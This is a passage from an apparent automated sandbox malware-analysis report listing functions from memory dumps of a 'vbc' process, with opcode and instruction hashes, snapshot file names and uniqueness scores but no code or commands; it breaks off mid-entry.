                                        • Instruction Fuzzy Hash: B2212E34B091448FC705AB78E95CA6D3FA2FB99311B1184AAE507CB3B2EE35DC45CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050963B Relevance: .1, Instructions: 77COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2cfd6a40924426ea7c6ba614d4642b84e3d30ac1da859adf80f172053052213f
                                        • Instruction ID: 2a17b514eebec5ce51a5aa76fafd5ea6cad78d6dc60d1f70591baf91e1d35b1e
                                        • Opcode Fuzzy Hash: 2cfd6a40924426ea7c6ba614d4642b84e3d30ac1da859adf80f172053052213f
                                        • Instruction Fuzzy Hash: DF41C474A052288FDB60DF24D848BACBBB2FB49311F0186E59549A7356DFB05EC1CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050824B Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81ebff18604fd0a7619e5e6ac11f98bb33141e70d56bd3d6de2511b8711a4dc6
                                        • Instruction ID: b546775e77cc874a0c5949813d424bc44407a372fd8fcc42d81b21b1e20dd264
                                        • Opcode Fuzzy Hash: 81ebff18604fd0a7619e5e6ac11f98bb33141e70d56bd3d6de2511b8711a4dc6
                                        • Instruction Fuzzy Hash: E9216235E0491A8FCB00DBA4C585EBFBFA1BF94310F258561D959A7291EE30DC42DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0021D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.477617220.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_21d000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 880a2a957273e891523a7a53f47874622e479099b4337365464ff7388be821a2
                                        • Instruction ID: a768bdb5a35f5a3e0c1f37910750c52dfd78499f64662c4366b15a8ac7e15358
                                        • Opcode Fuzzy Hash: 880a2a957273e891523a7a53f47874622e479099b4337365464ff7388be821a2
                                        • Instruction Fuzzy Hash: C7212575618244DFCB14CF14D884B5ABBA1EBAC314F30C56DD8094B246C33BD8A6CA61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00500448 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53419154db3a4ed78d031fedb596e812e668eeff0186fe3cf4613c7223376775
                                        • Instruction ID: 5652b451d204ff534e0b74aad096e00c87106485e6cd83842aab3930c8322015
                                        • Opcode Fuzzy Hash: 53419154db3a4ed78d031fedb596e812e668eeff0186fe3cf4613c7223376775
                                        • Instruction Fuzzy Hash: DC211974D00219CFCF00DFA9D8493EEBBF4BB49305F205829D619A3690DB745A45CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00508212 Relevance: .1, Instructions: 66COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2218d9d92bfa53659b8d5900e59a2fcd1835ca5ba10daa4b5a9df21a150c7ccc
                                        • Instruction ID: c75ed8447a96ce12e9a15ba8b49e155a5dc6a2292cd9b20267dd8d489e76600d
                                        • Opcode Fuzzy Hash: 2218d9d92bfa53659b8d5900e59a2fcd1835ca5ba10daa4b5a9df21a150c7ccc
                                        • Instruction Fuzzy Hash: 97216235E049168FCB00DBA4C585EBFBFB1BF94320F158561D949A7291EA30DD42CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005077A0 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 62716944514046213b18e5d0e5583148877d3b695549487a179d5894fa28e3a6
                                        • Instruction ID: 3b7e5f6a726ebcbf593a1893912c90918d95caabc0c7e4e4893df8f95b2bc1de
                                        • Opcode Fuzzy Hash: 62716944514046213b18e5d0e5583148877d3b695549487a179d5894fa28e3a6
                                        • Instruction Fuzzy Hash: 5F11FB74D082499FCB41DFA8D9849AEBFF0FF4A314B1085DAD819A7362E7319945CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0021D017 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.477617220.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_21d000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 156840bd31d7498b8674b00e34c4e3ed4dbb7506a38c07396b13f4cffb2ee809
                                        • Instruction ID: 190ff438a4a31523b981cfdb9ccc281282ff9fe64d93ea9c4f414b61671c98b9
                                        • Opcode Fuzzy Hash: 156840bd31d7498b8674b00e34c4e3ed4dbb7506a38c07396b13f4cffb2ee809
                                        • Instruction Fuzzy Hash: D9119D79504284DFCB11CF14D5C4B56FFA1FB98314F24C6AAD8094B656C33BD89ACBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00505F51 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6835e74b326622f9fa5880c51ad07615b0569da0be7dfa04eee6a940af68533a
                                        • Instruction ID: 672f4ebb2807c18fcb5eff387a5e4ffac41341e2c80976f0467ef5baf9e4afde
                                        • Opcode Fuzzy Hash: 6835e74b326622f9fa5880c51ad07615b0569da0be7dfa04eee6a940af68533a
                                        • Instruction Fuzzy Hash: 3521AF74E01219CFEB24DFA1C855BADBAB2FF84304F1085A9E919A7391CB355E82CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00506AAA Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98e94b7d70b22b3ef549eceb6f21afbb83b379f8b14c2719533e5d974a4ab8a2
                                        • Instruction ID: ab281524969c36b505a511f4aa1247e1c64330e8bcc6bd6981ea04b8bcfb25e5
                                        • Opcode Fuzzy Hash: 98e94b7d70b22b3ef549eceb6f21afbb83b379f8b14c2719533e5d974a4ab8a2
                                        • Instruction Fuzzy Hash: F411C374E0521ACFCB20CF58C984BEEBBB1BB49304F604595C409A7282C771AE84DF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000FD27D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.477578140.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_fd000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e49160c5fc5cdba195deee7238beea117b779d60098eb50dc1bfad565c34aa79
                                        • Instruction ID: 46ec4fababe3aa332d4d20d344624cfc86d522ee8e9dca84ba18063338a6de45
                                        • Opcode Fuzzy Hash: e49160c5fc5cdba195deee7238beea117b779d60098eb50dc1bfad565c34aa79
                                        • Instruction Fuzzy Hash: 8501D4310086489AE7A09A15C884B7FBBD9EF62724F24C51BEF095B586C378DC00EAF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507628 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 264544f8f977fbb871e9e42616ace2ce69d5c5a7c1b114ae603a9732d861383b
                                        • Instruction ID: cc2f0061cec438956a9fa463983c4754ecfa29258f007b3c5ab51ba7ba8d4ef5
                                        • Opcode Fuzzy Hash: 264544f8f977fbb871e9e42616ace2ce69d5c5a7c1b114ae603a9732d861383b
                                        • Instruction Fuzzy Hash: 9911B7B4D04609DFCB44DFA8C545AAEBBF5BF48304F2185A9D815A73A0D731AE40CF62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507E22 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cd43db590e3fe3a554263f1535bb72592ce3edfaae2a5d9bfccfbad0c138ea9a
                                        • Instruction ID: 5253bfe87c593625c09cc1cf5bbca6d52813dea990ad1ef5d6b54cad315a71cd
                                        • Opcode Fuzzy Hash: cd43db590e3fe3a554263f1535bb72592ce3edfaae2a5d9bfccfbad0c138ea9a
                                        • Instruction Fuzzy Hash: CCF028317052048FC7045779E8145AE7BAEABCA22131884AAD009C7761DE708C0283A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0050798F Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd82163481df4f92049f3e137991bf8fc06e36fa20faafc554962cfce2ba1aa8
                                        • Instruction ID: 3a6d31a8cb2807083caebbd5839499632ac309ebb5fab9bc069114bbb20da371
                                        • Opcode Fuzzy Hash: bd82163481df4f92049f3e137991bf8fc06e36fa20faafc554962cfce2ba1aa8
                                        • Instruction Fuzzy Hash: BAF0F431A0D1089FDB011B16FC4CA6E3F25FF69721B058867E906861A1DB309C419BA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005079A0 Relevance: .0, Instructions: 38COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0908ad627ccfedbe9042424062e83cac2bd1fd6e0cb0d07178ca41afbd35f220
                                        • Instruction ID: d3d3b80a65d0657fe44ef83c60018c6305c3a162d1a0b1e6559557a4504ba855
                                        • Opcode Fuzzy Hash: 0908ad627ccfedbe9042424062e83cac2bd1fd6e0cb0d07178ca41afbd35f220
                                        • Instruction Fuzzy Hash: 1DF06D71E0C11897DB001B56A98D66E7F1ABBAC721F158C37E90A82290CF206D81A692
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507749 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfee9ae9797d95e7a718a93529bf3292ecb3d133ddc27543ae171347ef006951
                                        • Instruction ID: 65b6d363b1360fd06a7320bc25547520a3b65404302d2ffbeb171d9095dbe712
                                        • Opcode Fuzzy Hash: cfee9ae9797d95e7a718a93529bf3292ecb3d133ddc27543ae171347ef006951
                                        • Instruction Fuzzy Hash: A0F03C70C092489FCB05DFA9E9585EEBFB0EB56344F1086EAD458A3252DB710904CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000FD27C Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.477578140.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_fd000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f75f7b007b38758bb15d13e6d328761c40e44e56b7350b28adc4f4b6d3790a95
                                        • Instruction ID: ab96c3181ca4e2e49649b71b875c6aab0f911e9478866e8d802a66726e200938
                                        • Opcode Fuzzy Hash: f75f7b007b38758bb15d13e6d328761c40e44e56b7350b28adc4f4b6d3790a95
                                        • Instruction Fuzzy Hash: 03F0C2314046449AE7508A05C888B63FFD8EF51734F28C55AEE485B286C3789C40CBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005071C3 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f4286589f872e1c01b4c46ebe91d2d8f8e8925d080e0323a0b98fe73523ff32f
                                        • Instruction ID: 306e9f51fe831bbe93e76d2f44ca2b13525f03b42e7409e753b496d9034e6644
                                        • Opcode Fuzzy Hash: f4286589f872e1c01b4c46ebe91d2d8f8e8925d080e0323a0b98fe73523ff32f
                                        • Instruction Fuzzy Hash: 3C019AB4E002288FCB68DF28C995BECBBF1AB58300F1085E9955AA3340DB719EC58F50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005068C7 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55415ba1e179507d0dc688bd2fb95d68c1e6f2a7d5107ab6bbba36c0687da35e
                                        • Instruction ID: ae5a0d855baf5ae3eaef3853b058a02250dde583e8c340e964855583fc909c58
                                        • Opcode Fuzzy Hash: 55415ba1e179507d0dc688bd2fb95d68c1e6f2a7d5107ab6bbba36c0687da35e
                                        • Instruction Fuzzy Hash: AC01EC34A04218DFCB10DF58D8A5BDD7BB1BB49304F1085E8E519AB391DB71AE84DF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507758 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c3c83d4189fa52b9fbda7a078e800ce56bdeac7ea057922b03d129e05c19d55
                                        • Instruction ID: ea3bed623c681017b24d80acb6e12b9c51f64e92b132cb05369fd2e1faf08e5e
                                        • Opcode Fuzzy Hash: 4c3c83d4189fa52b9fbda7a078e800ce56bdeac7ea057922b03d129e05c19d55
                                        • Instruction Fuzzy Hash: 3EF0C974D042099FCB44EFA9E9496ADBBF5FB99305F1085AAD818A3350DB701A40CF84
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005097D8 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f6374daad30b6e03728a5743922e93840b6a352ad2079bd50a23a9f0bf598031
                                        • Instruction ID: 7a37d8cf9841e33d3d420dfcaa0014d4739b19caea40c57d8fb5786410562bc5
                                        • Opcode Fuzzy Hash: f6374daad30b6e03728a5743922e93840b6a352ad2079bd50a23a9f0bf598031
                                        • Instruction Fuzzy Hash: 3AF0D470D14219DFDB10DFA8E888A9CBFF0FB08315F108A25D811B3296DB744444DF11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00508310 Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e16b65b55eae9ede826176f073a51f358f8715054bb8e47fb910476d1a12ee18
                                        • Instruction ID: 4ac87f72a1906b7fe996a0648506127c0796347bb746566dd2255a29fee06eef
                                        • Opcode Fuzzy Hash: e16b65b55eae9ede826176f073a51f358f8715054bb8e47fb910476d1a12ee18
                                        • Instruction Fuzzy Hash: 17D05E3130B3945FC3121B6868180E67FA8EE47061305409BE445C7166DE254C0187E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005060E8 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76792f062059bf9a4b74aef7012294a0dee29221f9bd53aea7fd894e6ca72a87
                                        • Instruction ID: 7653551b3ed68f7e09ba1c48667712e059a82c7d17c7efb7df4bba9dcc03c543
                                        • Opcode Fuzzy Hash: 76792f062059bf9a4b74aef7012294a0dee29221f9bd53aea7fd894e6ca72a87
                                        • Instruction Fuzzy Hash: 9FE01770E00209CFDB20CF59C881AEDBBF1FF4E300F2180A4C018A7260C7359A929F85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005093A0 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6b7b20ca144a59c2eae93a63689674e75c26d82ef7e76ed104dc8c07657df80c
                                        • Instruction ID: d2c1e4957fe88b320e69e9f10ceedba550982503e53a3d3b56f9668bf822df81
                                        • Opcode Fuzzy Hash: 6b7b20ca144a59c2eae93a63689674e75c26d82ef7e76ed104dc8c07657df80c
                                        • Instruction Fuzzy Hash: FFC04C303C0704AFE354DA5ADD47F017B99AF45F14F654091F3089F6F1DAA1F8004548
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507BA1 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1b39e5b48d88083937174711608be9d92c4d5b21601a9984670d3c6d40cfc2e
                                        • Instruction ID: 8d211c9a0c012b26b9cadb172128425b966bd835803e7e03520de58508409701
                                        • Opcode Fuzzy Hash: b1b39e5b48d88083937174711608be9d92c4d5b21601a9984670d3c6d40cfc2e
                                        • Instruction Fuzzy Hash: B5C0125268E7C40FD30303605C21A227F384B13A22F8A00D39A898F1E3E0490848873B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005082F0 Relevance: .0, Instructions: 10COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1196b34f5aa706e3ce5fa56dd0fc981f92bf5399634b1bc5397082f1b2231131
                                        • Instruction ID: 81a4f05b0b00df4f8777af81a7b630b64acae5831f4972d1c9489451b3308d02
                                        • Opcode Fuzzy Hash: 1196b34f5aa706e3ce5fa56dd0fc981f92bf5399634b1bc5397082f1b2231131
                                        • Instruction Fuzzy Hash: 26C08C3004F3C84FC3030F203C28070BFB8AE1202634900D2E4898B063D51808108B22
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00508370 Relevance: .0, Instructions: 7COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
                                        • Instruction ID: 308734e347fe5fbfc39d01466d26648a0473cab39bdc6a53ba3d68073832f9aa
                                        • Opcode Fuzzy Hash: d200006d66dfcaf3ad5dd5c1c75a4ffe651a9ea33eed7fff1a75258716443a08
                                        • Instruction Fuzzy Hash: 93B01230240208CFC200DB5DD444C0033FCAF49A0434000D0F1098B731C721FC00CA40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00508110 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfec7cd8343d909ceecbbd95ec2b21e1f17095f001f8f9164a94c81f8767dfda
                                        • Instruction ID: 7e2fc72a216605c4eec300d97088a7a1f4bfa721db5739f8e0e573de088c1061
                                        • Opcode Fuzzy Hash: cfec7cd8343d909ceecbbd95ec2b21e1f17095f001f8f9164a94c81f8767dfda
                                        • Instruction Fuzzy Hash: 2190023104964C8B45402795780D5A9F79D95759197808051A90E415529E6565104596
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00508300 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4d0e84471fb3f3794deda9d8b7122fbf8722d9d824bd423067a4aa10b5576a9
                                        • Instruction ID: e6ce637f1b720b1113116a0750803cebf402fcb4f0432f92c8b376bf3c3401aa
                                        • Opcode Fuzzy Hash: d4d0e84471fb3f3794deda9d8b7122fbf8722d9d824bd423067a4aa10b5576a9
                                        • Instruction Fuzzy Hash: 8D90023504964C8B46402795781D599B75DA5745297844051E90E41511DE5965104596
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507BF0 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d278b9d01ac2e5f6b3cc5ff237b688b3a8892c96854a7189df5e9fa27246d06
                                        • Instruction ID: e40f38c9b4b89913ea10839fb14478f846c7e97172ac11bb9069104c72a4123b
                                        • Opcode Fuzzy Hash: 0d278b9d01ac2e5f6b3cc5ff237b688b3a8892c96854a7189df5e9fa27246d06
                                        • Instruction Fuzzy Hash: 6D90023104968C8B454127D5780D5D5775D966452A7804051A50D425119E5565505596
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507BB0 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba9c1d12f6798bb5766a602610052c0cadf5886cf5426b0943f7b4990523ff6e
                                        • Instruction ID: 6ddd83702c161d330c6837abd74d13adc34e4fe2855eb37430cc44a42e64dcb5
                                        • Opcode Fuzzy Hash: ba9c1d12f6798bb5766a602610052c0cadf5886cf5426b0943f7b4990523ff6e
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00507E10 Relevance: .0, Instructions: 5COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c3bf84337eb2d948cbaf6750f438f55dd6435f2e5f8ec6121e6fb661f0b173e
                                        • Instruction ID: fa9f2550ff2beda3f74d5d97cedd7a2f17ba4a5f4c0a606aeeafbe0b5eaf65dd
                                        • Opcode Fuzzy Hash: 0c3bf84337eb2d948cbaf6750f438f55dd6435f2e5f8ec6121e6fb661f0b173e
                                        • Instruction Fuzzy Hash: 12900231049B4C8B454027997E0D595775E95645197804051A50D415129E5D651045DA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00500BC0 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.478154814.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_500000_vbc.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: }
                                        • API String ID: 0-4239843852
                                        • Opcode ID: a328e0c416856a6757a813db9c06a045cbfade0ef197e6f148fedb5e8dc8b934
                                        • Instruction ID: 6a7813638d72b250ea48b0f3ab42e38672c826fd3d5a59835869fcc839d434f7
